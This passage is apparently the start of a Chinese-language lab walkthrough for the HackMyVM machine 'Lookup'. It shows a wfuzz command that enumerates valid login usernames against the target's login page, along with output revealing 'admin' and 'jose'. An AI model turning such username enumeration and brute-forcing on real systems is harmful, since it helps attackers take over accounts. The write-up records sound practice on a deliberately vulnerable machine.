靶机地址https://hackmyvm.eu/machines/machine.php?vm=Lookup

直接访问报错，需要在/etc/hosts里设置域名lookup.hmv，再次访问主页显示一个登录页面。

扫描目录没有发现什么敏感文件，也没有什么漏洞，sql注入也不行。只能尝试爆破，先尝试爆出用户名。这里要注意wfuzz的语法，特别是要用多个-H加入必要的头信息。

└─$ wfuzz -c -w /usr/share/wordlists/seclists/Usernames/Names/names.txt   -H 'Host: lookup.hmv' -H 'Origin: http://lookup.hmv' -H 'Referer: http://lookup.hmv' -d "username=FUZZ&password=123456"  --hh 74  http://lookup.hmv/login.php 
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://lookup.hmv/login.php
Total requests: 10177

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                     
=====================================================================

000000086:   200        0 L      8 W        62 Ch       "admin"                                                                                                                                     
000004897:   200        0 L      8 W        62 Ch       "jose"                                                                                                                                      

Total time: 0
Processed Requests: 10177
Filtered Requests: 10175
Requests/sec.: 0

继续阅读 →